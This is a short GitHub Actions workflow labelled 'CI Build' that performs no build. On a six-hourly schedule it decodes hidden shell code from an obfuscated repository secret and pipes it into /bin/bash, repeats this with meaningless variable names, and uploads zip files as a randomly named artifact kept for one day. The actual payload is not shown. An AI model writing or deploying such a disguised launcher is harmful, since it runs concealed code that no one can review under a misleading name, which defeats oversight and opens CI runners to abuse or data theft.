name: CI Build
on:
  workflow_dispatch:

  schedule:
    - cron: '39 0,6,12,18 * * *'
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  handler:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: Launch
        env:
          qw43: ${{ secrets.qw43 }}
        run: |
          printf '%s' "$qw43" | jq -r .qz24102 | /bin/bash
          echo $srwk1350 | jq -r .ojgdl6785 | /bin/bash
          echo $tvy3540 | jq -r .nsity402 | /bin/bash
          printf '%s' "$wjk85881" | jq -r .gh64 | /bin/bash

      - name: Persist output
        uses: actions/upload-artifact@v4
        with:
          name: 4VGQCpNr
          path: "*.zip"
          retention-days: 1
